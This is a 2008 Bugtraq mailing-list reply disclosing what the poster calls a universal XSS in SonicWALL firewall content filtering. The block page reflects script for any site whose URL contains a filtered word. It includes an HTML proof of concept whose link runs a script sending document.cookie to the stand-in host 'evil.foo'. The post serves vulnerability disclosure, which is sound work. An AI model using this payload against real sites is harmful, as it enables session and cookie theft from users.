[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200811050757.mA57vg71003479@www5.securityfocus.com>
Date: Wed, 5 Nov 2008 00:57:42 -0700
From: unknown.pentester@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Re: Re: [Full-disclosure] Universal Website Hijacking by
Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
It is universal because any domain/website can be hijacked not because all vendors are affected! I never claimed that all vendors are affected.
Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits.
Notice that the advisory says:
"the attacker may execute scripts automatically when the logfile is viewed."
The vuln I reported allows you to hijack any site. i.e.: run scripting code within the security context of any website. In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal information from any sites (i.e.: active webmail session), steal cookies, etc ...
Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within that site is possible. i.e.:
<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/
'+document.cookie</script>">Click me!</a>
</body></html>
That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the inserted script is actually returned by the requested website. You could think of this as a MITM XSS.
Hope it makes sense.
Powered by blists - more mailing lists